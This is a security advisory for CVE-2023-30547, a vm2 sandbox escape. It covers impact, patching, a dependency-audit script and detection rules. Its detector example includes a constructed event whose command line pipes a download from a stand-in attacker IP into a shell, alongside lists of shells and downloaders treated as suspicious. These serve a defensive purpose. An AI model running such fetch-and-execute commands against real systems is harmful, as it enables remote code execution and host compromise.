CVE-2023-30547

9.8 CRITICAL

📋 TL;DR

This vulnerability in vm2, a sandbox library for running untrusted JavaScript inside a Node.js process, lets attacker-supplied script escape the sandbox and execute arbitrary code on the host. The root cause is improper sanitization of host exceptions in vm2's exception handler (handleException()): a script can raise an unsanitized host exception and use it to reach host-context objects. It affects every application that uses vm2 versions up to and including 3.9.16 to run untrusted JavaScript. The impact is severe because the sandboxed code ends up running with the full privileges of the host Node.js process.

💻 Affected Systems

Products:
  • vm2
Versions: All versions up to and including 3.9.16
Operating Systems: All operating systems running Node.js
Default Config Vulnerable: ⚠️ Yes
Notes: Any application that hands untrusted JavaScript to vm2 is exposed. The escape does not depend on vm2 options (restricting builtin modules or disabling require does not prevent it), so there is no configuration-only workaround.

📦 What is this software?

vm2 is an npm library for running untrusted JavaScript inside a Node.js process. It wraps Node's built-in 'vm' module and uses Proxy objects to keep host objects (require, process, host prototypes) out of reach of the sandboxed script. It is commonly embedded in plugin systems, workflow and automation engines, and services that evaluate user-supplied scripts. Its maintainer discontinued the project in 2023 after a series of sandbox escapes and recommends migrating to isolated-vm.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete host system takeover with attacker gaining full control over the server, allowing data theft, lateral movement, and persistent backdoor installation.

🟠

Likely Case

Remote code execution on the host system, enabling data exfiltration, cryptocurrency mining, or participation in botnets.

🟢

If Mitigated

Limited impact if the process that hosts vm2 runs with minimal privileges (non-root, read-only file system, no credentials, no network egress) and handles only isolated, non-critical work, so that an escape yields little beyond that process.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Proof-of-concept code is publicly available in GitHub gists and security advisories, making exploitation straightforward for attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.9.17

Vendor Advisory: https://github.com/patriksimek/vm2/security/advisories/GHSA-ch3r-j5x3-6q2m

Restart Required: Yes

Instructions:

1. Update the vm2 dependency to 3.9.17 or later with an explicit install, e.g. 'npm install vm2@^3.9.17' or 'yarn upgrade vm2@^3.9.17'. Note that 'npm update vm2' only moves within the range declared in package.json, so a pinned or tilde range will not pick up the fix until the range is changed.
2. Check for nested copies pulled in by other packages ('npm ls vm2 --all') and update or override those too; a single unpatched copy is enough to be exploitable.
3. Restart all Node.js processes that load vm2; the fix takes effect only when the new module is loaded.
4. Test that sandbox functionality still works as expected with known-safe scripts.

🧯 If You Can't Patch

  • Isolate the process that hosts vm2: run it as an unprivileged user in its own container or VM with a read-only file system, no secrets or credentials, and no network egress except to the backends it genuinely needs, so an escape is contained at the process boundary rather than the (broken) sandbox boundary.
  • Stop executing untrusted code with vm2. Remove the feature entirely, or move it behind an isolation boundary that is not an in-process JavaScript sandbox: a separate minimal-privilege process or container, or a V8-isolate-based library such as isolated-vm, which is what vm2's own maintainer recommends now that the project is discontinued.

🔍 How to Verify

Check if Vulnerable:

Run 'npm ls vm2 --all' (or inspect package-lock.json / yarn.lock). package.json only declares a version range, not what is actually installed. Any copy at 3.9.16 or lower, including copies nested under other packages, means the application is vulnerable.

Check Version:

npm ls vm2 --all

Verify Fix Applied:

After updating, run 'npm ls vm2 --all' again and confirm that every listed copy is 3.9.17 or higher, then test sandbox functionality with known-safe scripts.
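The version check above, as an added example that is not part of the original page or of vm2 itself: a small Node.js script that walks the JSON tree printed by 'npm ls vm2 --all --json' and flags every vm2 copy older than 3.9.17, including copies nested under other packages. The tree shape (version plus a nested dependencies map) is npm's; the sample tree, the package name 'example-plugin' and the script name 'vm2-audit.js' are constructed for the example.

```javascript
// Added example: audit the dependency tree printed by `npm ls vm2 --all --json`
// for vm2 copies older than 3.9.17. Assumes npm's JSON tree shape
// ({ version, dependencies: { <name>: { version, dependencies } } }) and
// plain numeric x.y.z versions; any prerelease suffix is ignored.

const FIXED_VERSION = '3.9.17'; // first release carrying the fix for CVE-2023-30547

// Numeric compare of two dotted versions: returns -1, 0 or 1.
function cmpVersion(a, b) {
  const parse = (v) => v.split('-')[0].split('.').map((n) => parseInt(n, 10) || 0);
  const pa = parse(a);
  const pb = parse(b);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function isVulnerableVersion(version) {
  return cmpVersion(version, FIXED_VERSION) < 0;
}

// Depth-first walk over the tree; every vm2 node is reported together with the
// dependency path that pulled it in, so nested copies are not missed.
function findVm2(tree, path = [], out = []) {
  for (const [name, node] of Object.entries(tree.dependencies || {})) {
    const here = [...path, `${name}@${node.version || '?'}`];
    if (name === 'vm2') {
      out.push({
        path: here.join(' > '),
        version: node.version || null,
        // npm prints "missing"/"invalid" entries without a version; those need a manual look
        vulnerable: node.version ? isVulnerableVersion(node.version) : null,
      });
    }
    findVm2(node, here, out);
  }
  return out;
}

// Anything not positively known to be patched (unknown version included) is flagged.
function audit(tree) {
  const findings = findVm2(tree);
  return { findings, vulnerable: findings.filter((f) => f.vulnerable !== false) };
}

// Constructed sample tree: a patched direct dependency plus an unpatched copy
// nested under a hypothetical plugin package.
const SAMPLE_TREE = {
  name: 'example-app',
  version: '1.0.0',
  dependencies: {
    vm2: { version: '3.9.17' },
    'example-plugin': { version: '2.1.0', dependencies: { vm2: { version: '3.9.16' } } },
  },
};

// Prints one line per vm2 copy and returns true only if none is vulnerable.
function report(tree) {
  const { findings, vulnerable } = audit(tree);
  for (const f of findings) {
    console.log(`${f.vulnerable === false ? 'OK  ' : 'FAIL'} ${f.path}`);
  }
  return vulnerable.length === 0;
}

if (process.argv.includes('--stdin')) {
  // Real run against a project:  npm ls vm2 --all --json | node vm2-audit.js --stdin
  const ok = report(JSON.parse(require('fs').readFileSync(0, 'utf8')));
  process.exitCode = ok ? 0 : 1;
} else {
  report(SAMPLE_TREE); // demo on the constructed tree
}
```

Run without arguments it audits the constructed sample (one OK line for the direct copy, one FAIL line for the nested 3.9.16); with '--stdin' it reads a real 'npm ls' tree and exits non-zero if any copy is unpatched, which makes it usable as a CI gate.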

📡 Detection & Monitoring

Log Indicators:

  • Child processes spawned by a Node.js process that should never spawn any (shells, interpreters, curl/wget), since escaped code typically reaches child_process on the host
  • File system access outside the application's working set (reading /etc, SSH keys, environment files, writing to cron or startup locations)
  • Unexpected host-side exceptions or stack traces surfacing from sandboxed scripts in application logs; the escape works by raising a host exception inside the sandbox

Network Indicators:

  • Outbound connections to suspicious IPs from Node.js processes
  • Unusual data exfiltration patterns

SIEM Query:

(event_type:process_create AND parent_process_name:(node OR node.exe) AND process_name:(sh OR bash OR dash OR cmd.exe OR powershell.exe OR curl OR wget))
OR
(event_type:network_connection AND process_name:(node OR node.exe) AND NOT dest_ip:(<allow-listed backend addresses>))

The first clause catches the usual post-escape step (a shell or downloader spawned by the Node.js host process); the second catches egress from the host process to anything outside its known backends. Both need tuning per application: some Node.js services legitimately spawn child processes, and the allow-list must be filled in from the application's real dependencies.
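The detection logic in the query above, as an added example that is not part of the original page, run over a handful of constructed process-creation and network-connection events. Field names follow the query (event_type, process_name, parent_process_name, process_command_line); dest_ip, dest_port, the backend allow-list and the sample events are assumptions made for this example, and 198.51.100.7 is a documentation-range address standing in for an attacker host.

```javascript
// Added example: flag the two post-escape behaviours the SIEM query looks for,
// over in-memory event records. Field names match the query; dest_ip/dest_port,
// the allow-list and the events themselves are constructed for the example.

const NODE_NAMES = new Set(['node', 'node.exe', 'nodejs']);
// Interpreters and downloaders a sandbox host process should never spawn.
const SUSPICIOUS_CHILDREN = new Set([
  'sh', 'bash', 'dash', 'zsh', 'cmd.exe', 'powershell.exe', 'pwsh',
  'python', 'python3', 'perl', 'curl', 'wget', 'nc',
]);
// Constructed allow-list: the database and cache this application legitimately talks to.
const ALLOWED_DESTS = new Set(['10.0.0.5:5432', '10.0.0.9:6379']);

// Strip directory and case so '/usr/bin/node' and 'C:\\node\\node.exe' both match.
function baseName(p) {
  return (p || '').split(/[\\/]/).pop().toLowerCase();
}

// Returns an alert object for a suspicious event, or null for a benign one.
function evaluate(ev) {
  const proc = baseName(ev.process_name);
  const parent = baseName(ev.parent_process_name);

  if (ev.event_type === 'process_create' && NODE_NAMES.has(parent) && SUSPICIOUS_CHILDREN.has(proc)) {
    return {
      rule: 'node_spawned_interpreter',
      severity: 'high',
      detail: `${parent} spawned ${proc}: ${ev.process_command_line || ''}`.trim(),
    };
  }

  if (ev.event_type === 'network_connection' && NODE_NAMES.has(proc)) {
    const dest = `${ev.dest_ip}:${ev.dest_port}`;
    if (!ALLOWED_DESTS.has(dest)) {
      return { rule: 'node_unexpected_egress', severity: 'medium', detail: `${proc} -> ${dest}` };
    }
  }

  return null;
}

function detect(events) {
  return events.map(evaluate).filter(Boolean);
}

// Constructed sample: one escape-style spawn, one benign spawn (npm starting node),
// one allowed backend connection and one connection to an unknown external host.
const SAMPLE_EVENTS = [
  { event_type: 'process_create', process_name: '/bin/sh', parent_process_name: '/usr/bin/node',
    process_command_line: 'sh -c "curl http://198.51.100.7/x | sh"' },
  { event_type: 'process_create', process_name: '/usr/bin/node', parent_process_name: '/usr/bin/npm',
    process_command_line: 'node server.js' },
  { event_type: 'network_connection', process_name: '/usr/bin/node', dest_ip: '10.0.0.5', dest_port: 5432 },
  { event_type: 'network_connection', process_name: '/usr/bin/node', dest_ip: '198.51.100.7', dest_port: 443 },
];

for (const a of detect(SAMPLE_EVENTS)) {
  console.log(`[${a.severity}] ${a.rule}: ${a.detail}`);
}
```

On the sample this yields two alerts (the shell spawned by node, and the egress to 198.51.100.7) and stays quiet on the benign events. In production the allow-list and the child-process set are the tuning knobs: an application that legitimately shells out (for example to git or ImageMagick) needs those binaries removed from the suspicious set or matched on command line rather than name.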
